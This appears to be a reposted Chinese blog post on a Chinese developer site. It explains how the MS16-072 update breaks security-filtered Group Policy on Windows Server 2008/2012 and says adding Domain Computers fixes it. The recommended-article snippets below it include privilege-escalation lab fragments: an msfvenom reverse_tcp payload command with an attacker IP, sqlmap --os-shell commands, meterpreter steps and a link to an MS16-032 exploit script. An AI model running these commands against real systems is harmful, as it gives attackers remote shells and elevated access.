MS16-072导致WINDOWS 2008 2012基于用户过滤的组策略大面积失效

最新推荐文章于 2023-03-04 14:21:12 发布

weixin_34278190

最新推荐文章于 2023-03-04 14:21:12 发布

阅读量166

点赞数

原文链接：http://blog.51cto.com/powerz/1862103

版权

最近发现很多，用户组策略失效，发现他们有一个共同的特点，就是他们使用的用户过滤，将默认的，Authernticated users从Security filtering中去掉，加入了相应的应该适用此组策略的特定用户或组。

后来相了很久才发现是微软的安全更新改变了应用组策略的方法。安全更新是

MS16-072 日期是：2016 06 14

https://support.microsoft.com/en-sg/kb/3163622

如果你运行gpresult /h result.html 打开result.html，在denied GPOs你应当发现很多 Inaccessible无法访问的条目(如图)。

这就表明你的2008 2012活动目录的域的组策略受了此更新的影响。

解决的办法如上图所示，需要将domain computers用户组加入。

转载于:https://blog.51cto.com/powerz/1862103

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_34278190

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

ms16-016提权

qq_54713392的博客

05-08

1234

ms16-016提权简介：靶机需32位windows系统攻击机：kali IP地址为：192.168.32.132 目标机：windows32 IP地址：192.168.32.135 先ping两台主机看是否通步骤： 1）生成木马，设置本地ip地址192.168.32.132和端口号4444 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.32.132 LPORT=4444 -f exe > /root/test.exe 2）

〖教程〗Ladon提权MS16-135参数版(WIN7-2016)

K8哥哥

08-08

1302

漏洞名称 Win32k 特权提升漏洞(MS16-135)(CVE-2016-7255) 漏洞等级高危漏洞类型本地提权漏洞描述如果 Windows 内核模式驱动程序无法正确处理内存中对象，则会存在多个特权提升漏洞。成功利用此漏洞的攻击者可以在内核模式下运行任意代码。攻击者可随后安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新帐户。攻击者必须先登录系统，然后才能利用这些漏洞。然后攻击者可以运行一个为利用这些漏洞而经特殊设计的应用程序，从而控制受影响的系统。该更新通过更正 Windows

参与评论您还未登录，请先登录后发表或查看评论

MS16-032 提权漏洞复现

Adminxe的博客

06-14

2380

exploit-db的详情：https://www.exploit-db.com/exploits/39574/ 注意点：此漏洞影响从Vista到Windows 10的所有Windows版本（包括服务器版本）以及为了实现利用，因为PowerShell脚本指示需要满足以下要求：目标系统需要有2个以上的CPU核心 PowerShell v2.0及更高版本必须正在运行此漏洞会影响以下Microsoft产品： Windows Vista Windows 7 Windows 8.1 Windows 1...

【安全】靶场实战-通过MS16-032提权

03-04

1163

该漏洞影响从Vista到Windows 10的所有Windows版本（包括服务器版本）。Windows 7Windows 10目标系统需要有2个以上的CPU核心。PowerShell v2.0及更高版本必须正在运行。可根据MS16-032(KB3139914)补丁是否安装，来判断当前版本是否可利用。

利用WMIC实战MS１６－０３２本地溢出漏洞

岁月净好

11-29

3145

假设此处我们通过了一系列的渗透测试得到了目标机器的Meterpreter Shell. 　　首先输入getuid命令查看已经获得的权限，可以看到现在的权限很低，是test权限。 meterpreter > getuid Server username:WIN-S7TJ4B561MT\test 尝试输入getsystem命令提权，结果失败。 meterpreter > getsystem 接着查看系统的已达补丁，传统的方法是在目标机的CMD命令行下输入systeminfo命令，或者通过查

MS16-032 漏洞复现

EC_Carrot的博客

04-07

712

漏洞背景 Secondary Logon Service是其中的一个辅助登录服务。 Microsoft Windows的辅助登录服务存在特权提升漏洞，该漏洞源于程序没有正确管理内存中的请求句柄。本地攻击者可利用该漏洞以管理员身份运行任意代码。微软在2016年3月8日已经更新了该漏洞的补丁文件KB3139914 影响范围 Microsoft Windows Vista SP2 Windows Server 2008 SP2和R2 SP1 Windows 7 SP1 Windows 8.1 Windows

ms16-032本地溢出漏洞

最新发布

06-27

【标题】：“ms16-032本地溢出漏洞”是微软在2016年发布的一个重要的安全更新，该漏洞主要影响Windows操作系统。这个漏洞的命名方式遵循了微软的传统，即“ms”代表微软，“16”代表2016年，而“032”则可能是该年中...

MS16-016漏洞复现

qq_45440239的博客

06-01

1878

复现MS16-016漏洞

计算机丢失sspicli,MS16-047：SAM 和 LSAD 远程协议安全更新程序说明：2016 年 4 月 12 日...

weixin_34902502的博客

07-24

1585

此软件更新程序的英语(美国)版本将安装具有下表所列属性的文件。Windows Vista 和 Windows Server 2008 文件信息注意通过检查下表中显示的文件版本号，可以识别适用于特定产品、里程碑(RTM、SPn)和服务分支(LDR、GDR)的文件：版本产品里程碑服务分支6.0.600 2.19xxxWindows Vista 或 Windows Server 2008SP2GDR6....

AD域更新计算机配置组策略无效的解决

eggsound的博客

08-13

7240

组策略对所在的容器内的用户和计算机起作用，你的计算机有没有放在策略所在的容器内？？？比方说你是在销售部的OU上做的策略，但是你销售部的计算机在computers里没在销售部OU内，那计算机当然不会受到策略的控制了 ...

域Authenticated users

09-29

733

如你定义一个GPO到一个OU，那么这个OU下面的所有子OU的计算机和用户都属于Authenticated users

sqlmap注入及ms16-075提权总结

weixin_33696106的博客

06-04

963

sqlmap注入及ms16-075提权总结（1）sqlmap执行命令sqlmap.py -r 1**.***.***.***.txtsqlmap.py -r 1**.***.***.***.txt --is-dbsqlmap.py -r 1**.***.***.***.txt --password --batchsqlmap.py -r 1**.***.***.***.txt --os-shell...

无法打开组策略的五种解决方法

编制者的专栏

05-13

1万+

【原文链接】：http://hi.baidu.com/ywgnom/blog/item/58d02e33b8652bf81a4cffb6.html无法打开组策略的解决方法有五种方法一、1、点击”开始”菜单　　2、点击“运行” 　　3、键入"regedit"（不包括感叹号） 4、在注册表键值　HKEY_CURRENT_USER/Software/Policies/Microso

win7管理员打开组策略,拒绝访问

jiangfeng0213的专栏

08-31

2282

管理员打开组策略,拒绝访问。把 C:\WINDOWS\system32\GroupPolicy\gpt.ini 删了，再运行 gpedit.msc 就OK 了（感谢帖作者！）：http://social.microsoft.com/Foru ... b-990b-972252436985...

powershell之ms16-032复现

qq_45300786的博客

12-14

695

因为楼主没有合适的靶机，就简单说一下环境要求。 1、存在ms16-032的靶机 2、ms16-032的ps1脚本 3、powershell默认是不能运行脚本的，请自己手动开启（百度） 4、ms16-032脚本：https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1 参考文章 http://www.96sec.org/blog/post/209.html https://blo

基于Windows系统下网络数据包过滤方法的分析